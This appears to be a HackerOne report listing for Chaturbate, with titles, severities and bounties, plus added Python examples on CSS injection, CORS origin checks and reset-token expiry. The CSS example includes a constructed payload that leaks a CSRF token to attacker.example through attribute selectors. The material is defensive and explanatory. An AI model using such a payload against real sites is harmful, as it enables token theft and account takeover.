Chaturbate - HackerOne Reports
Total reports: 52
Critical: 1
High: 4
Medium: 14
Low: 28
CSV Injection with the CSV export feature
Reported by: hackaccinocraft | Disclosed:
Severity: Low
Weakness: OS Command Injection
Users may still be able to view the chat room panel of password-protected rooms
Reported by: mikkz | Disclosed:
Severity: Medium
Weakness: Improper Access Control - Generic
Login form on non-HTTPS page on http://stream.highwebmedia.com/auth/login/
Reported by: gujjuboy10x00 | Disclosed:
Severity: Low
Weakness: Cleartext Transmission of Sensitive Information
CSS Injection on /embed/ via bgcolor parameter leaks user's CSRF token and allows for XSS
Reported by: nahamsec | Disclosed:
Severity: High
Weakness: Cross-site Scripting (XSS) - DOM
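Only the title of the report above is on this page, so this is an added example rather than the reporter's or the site's code. It shows the general shape of the bug the title describes: a colour parameter reflected into a style block, where a `}` in the value ends the intended rule and lets the attacker add attribute-selector rules that leak a hidden form value character by character. The hardened version validates the parameter against a colour allowlist instead of reflecting it. The `/embed/` path and `bgcolor` name come from the title; the `csrf_token` input name, the attacker host and the payload are constructed.

```python
import re

# Allowlist for a colour parameter: short or long hex, or a bare keyword.
_HEX_COLOR = re.compile(r"^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$")
_COLOR_KEYWORD = re.compile(r"^[A-Za-z]{1,20}$")
DEFAULT_COLOR = "#ffffff"


def render_embed_vulnerable(bgcolor):
    """Reflect the query parameter straight into a <style> block, the pattern
    behind the CSS injection: a '}' in the value closes the intended rule and
    everything after it is parsed as the attacker's own CSS."""
    return "<style>body{background:%s}</style>" % bgcolor


def validate_color(bgcolor):
    """Return bgcolor only if it is a bare hex colour or keyword, else the
    default. Rejecting is used instead of escaping: a strict allowlist is
    easier to get right than CSS string escaping for a free-form value."""
    if _HEX_COLOR.match(bgcolor) or _COLOR_KEYWORD.match(bgcolor):
        return bgcolor
    return DEFAULT_COLOR


def render_embed_hardened(bgcolor):
    return "<style>body{background:%s}</style>" % validate_color(bgcolor)


def injected_rules(markup):
    """Number of CSS rules in the style block beyond the one intended rule,
    i.e. how many rules the parameter managed to smuggle in."""
    inner = markup[len("<style>"):-len("</style>")]
    return inner.count("{") - 1


# Constructed payload. It closes the background property, then adds an
# attribute-selector rule of the kind used to leak a hidden form value one
# character at a time: the browser fetches the URL only if the token value
# starts with "a". The input name and the attacker host are illustrative.
PAYLOAD = (
    'red} input[name="csrf_token"][value^="a"]'
    '{background:url(//attacker.example/leak/a)'
)

if __name__ == "__main__":
    print(render_embed_vulnerable(PAYLOAD))
    print(render_embed_hardened(PAYLOAD))
```

The allowlist deliberately has no escape hatch for named colours with digits, spaces or function syntax (`rgb(...)`, `var(...)`); if those are needed, parse them into components and re-serialize rather than passing the original string through.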
Cross-origin resource sharing: arbitrary origin trusted on chatws25.stream.highwebmedia.com
Reported by: mase289 | Disclosed:
Weakness: Improper Access Control - Generic
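The report above names the misconfiguration (any Origin trusted) but no details are on this page, so the following is an added example and not the service's code. It contrasts the echo-the-Origin pattern with an origin validator that avoids the usual `endswith()` mistakes, and it goes slightly beyond the title by also handling the `null` origin and userinfo tricks. The allowlist, the HTTPS-only rule and the parent domain are assumptions for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlist; the service's real list is not known from the report.
ALLOWED_ORIGINS = {"https://chaturbate.com", "https://www.chaturbate.com"}
ALLOWED_PARENT_DOMAINS = ("highwebmedia.com",)


def cors_headers_vulnerable(request_headers):
    """Echo whatever Origin the browser sent. Combined with
    Allow-Credentials: true this lets any site read responses that carry
    the victim's cookies, which is what "arbitrary origin trusted" means."""
    origin = request_headers.get("Origin")
    if origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def origin_allowed(origin):
    """Exact-match or real-subdomain check on a serialized Origin value."""
    if not origin or origin == "null":      # sandboxed iframes, data: and file: pages
        return False
    parts = urlsplit(origin)
    # A serialized origin is scheme://host[:port] and nothing else.
    if parts.scheme != "https" or not parts.netloc:
        return False
    if parts.path or parts.query or parts.fragment or parts.username:
        return False
    if origin in ALLOWED_ORIGINS:
        return True
    host = parts.hostname or ""
    # Subdomain test that rejects "evilhighwebmedia.com" and
    # "highwebmedia.com.attacker.example", the two classic endswith() slips.
    return any(host == d or host.endswith("." + d) for d in ALLOWED_PARENT_DOMAINS)


def cors_headers_hardened(request_headers):
    origin = request_headers.get("Origin")
    if not origin_allowed(origin):
        return {}   # no ACAO header at all, so the browser refuses the read
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",   # stop caches replaying one origin's header to another
    }
```

When checking a live endpoint, send a request with an `Origin` header for a host you control and look for it echoed in `Access-Control-Allow-Origin` together with `Access-Control-Allow-Credentials: true`; either header alone is far less serious than the pair.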
Form Replay in customer information form
Reported by: imran0x01 | Disclosed:
Severity: Medium
Weakness: Insufficiently Protected Credentials
Forgot password link not expiring after email change
Reported by: imran_nisar | Disclosed:
Severity: Medium
Weakness: Improper Authorization
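The title above describes a reset link that stays valid after the account's email changes. As an added example (not the site's implementation), here is one design that closes that gap without server-side token storage: the token is an HMAC over the user id, an expiry and a fingerprint of the account state the link depends on (email and password hash), so changing either, including completing the reset, voids every outstanding link. The key, TTL, `User` class and sample accounts are constructed for the example.

```python
import base64
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)   # constructed per-process secret; use a managed key in practice
TOKEN_TTL = 3600                       # assumed one-hour lifetime
TAG_LEN = 32                           # SHA-256 HMAC length in bytes


class User:
    """Minimal stand-in for the account record."""
    def __init__(self, uid, email, password_hash="hash0"):
        self.uid = uid
        self.email = email
        self.password_hash = password_hash


def _mac(payload):
    return hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()


def _state_fingerprint(user):
    # Everything that should void an outstanding link goes in here: the
    # address the link was mailed to and the current password hash, so a
    # change of either (including a successful reset) invalidates the token.
    return hashlib.sha256(f"{user.email}\0{user.password_hash}".encode()).hexdigest()


def issue_reset_token(user, now=None):
    exp = int(time.time() if now is None else now) + TOKEN_TTL
    payload = f"{user.uid}:{exp}:{_state_fingerprint(user)}".encode()
    return base64.urlsafe_b64encode(payload + _mac(payload)).decode()


def verify_reset_token(token, lookup_user, now=None):
    """Return the User if the token is authentic, unexpired and still matches
    the account's current email and password hash; otherwise None."""
    try:
        raw = base64.urlsafe_b64decode(token.encode())
    except ValueError:                     # binascii.Error is a ValueError
        return None
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    if len(tag) != TAG_LEN or not hmac.compare_digest(tag, _mac(payload)):
        return None
    try:
        uid_s, exp_s, fp = payload.decode().split(":")
        uid, exp = int(uid_s), int(exp_s)
    except ValueError:
        return None
    if int(time.time() if now is None else now) >= exp:
        return None
    user = lookup_user(uid)
    if user is None or not hmac.compare_digest(fp, _state_fingerprint(user)):
        return None
    return user


def demo():
    """Issue a link, change the account email, and show the link is dead."""
    users = {1: User(1, "alice@example.com")}
    token = issue_reset_token(users[1], now=1000)
    before = verify_reset_token(token, users.get, now=1500) is not None
    users[1].email = "alice.new@example.com"      # changed after the mail went out
    after = verify_reset_token(token, users.get, now=1500) is not None
    return before, after
```

Binding to the password hash also makes the link single-use once the reset succeeds, which the stateless design would otherwise lack; if a link must die as soon as a newer one is requested, add a per-user counter to the fingerprint and bump it on each issue.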
Missing Rate Limitation at /apps/upload_app/
Reported by: footstep | Disclosed:
Severity: Low
Weakness: Business Logic Errors
CSRF in cancel group and private show requests
Reported by: encrypt | Disclosed:
Severity: Medium
Weakness: Cross-Site Request Forgery (CSRF)
Bounty: $300.00
CSRF in "send them an email and browser notification" feature
Reported by: encrypt | Disclosed:
Severity: Low
Weakness: Cross-Site Request Forgery (CSRF)
Bounty: $150.00
Stored XSS on chaturbate.com (wish list)
Reported by: glc | Disclosed:
Severity: Low
Weakness: Cross-site Scripting (XSS) - Stored
Bounty: $100.00
Reflected XSS on ssl-ccstatic.highwebmedia.com via player.swf
Reported by: nahamsec | Disclosed:
Severity: Medium
Weakness: Cross-site Scripting (XSS) - Reflected
Page 3 of 3